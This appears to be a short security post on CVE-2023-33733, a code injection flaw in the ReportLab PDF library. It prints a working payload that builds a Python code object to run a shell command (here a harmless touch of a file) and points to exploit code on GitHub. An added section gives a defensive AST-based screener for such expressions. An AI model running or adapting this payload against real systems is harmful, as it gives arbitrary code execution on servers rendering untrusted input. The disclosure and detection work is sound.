
Web CODE INJECTION IN REPORTLAB Python LIBRARY (CVE-2023-33733)

fikri

ReportLab is an open-source project that allows the creation of documents in Adobe's Portable Document Format (PDF) using the Python programming language.

Exploit Code: Github

Payload:

Python:
[
    [
        [
             [
                 ftype(ctype(0, 0, 0, 0, 3, 67, b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00',
                       (None, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\x12\x01'), {})()
                 for ftype in [type(lambda: None)]
             ]
             for ctype in [type(getattr(lambda: {None}, Word('__code__')))]
        ]
        for Word in [orgTypeFun('Word', (str,), {
            'mutated': 1,
            'startswith': lambda self, x: False,
            '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x,
            'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
            '__hash__': lambda self: hash(str(self))
        })]
    ]
    for orgTypeFun in [type(type(1))]
]
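
A screening heuristic for expressions shaped like the payload above, as an added example that is not part of the original post or of ReportLab: it parses an untrusted expression string with Python's `ast` module, never evaluates it, and reports the constructs this payload relies on (`type`/`getattr`/`setattr` calls, dunder names passed as strings, long bytes literals, lambdas). The function name `suspicious_constructs` and both sample strings are constructed for illustration.

```python
import ast

# Names the payload on this page calls to reach type objects and attributes.
RISKY_CALLS = {"type", "getattr", "setattr"}


def suspicious_constructs(expr: str) -> list[str]:
    """Parse expr (never evaluate it) and list constructs the payload relies on."""
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError:
        return ["unparseable"]
    findings = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in RISKY_CALLS:
                findings.add(f"call:{node.func.id}")
        elif isinstance(node, ast.Constant):
            value = node.value
            if isinstance(value, str) and value.startswith("__") and value.endswith("__"):
                findings.add(f"dunder-string:{value}")
            elif isinstance(value, bytes) and len(value) > 8:
                findings.add("bytes-literal")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.add(f"dunder-attr:{node.attr}")
        elif isinstance(node, ast.Lambda):
            findings.add("lambda")
    return sorted(findings)


# Constructed samples: one harmless value, and one fragment shaped like the
# payload (it contains no code object or command and does nothing if evaluated).
BENIGN = "[1, 0.5, 0]"
SHAPED = "[t for t in [type(getattr(lambda: None, '__code__'))]]"

if __name__ == "__main__":
    for sample in (BENIGN, SHAPED):
        print(sample, "->", suspicious_constructs(sample) or "clean")
```

Legitimate values rarely need any of these constructs, so any finding is worth logging and rejecting before the string is handed to the library.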
 

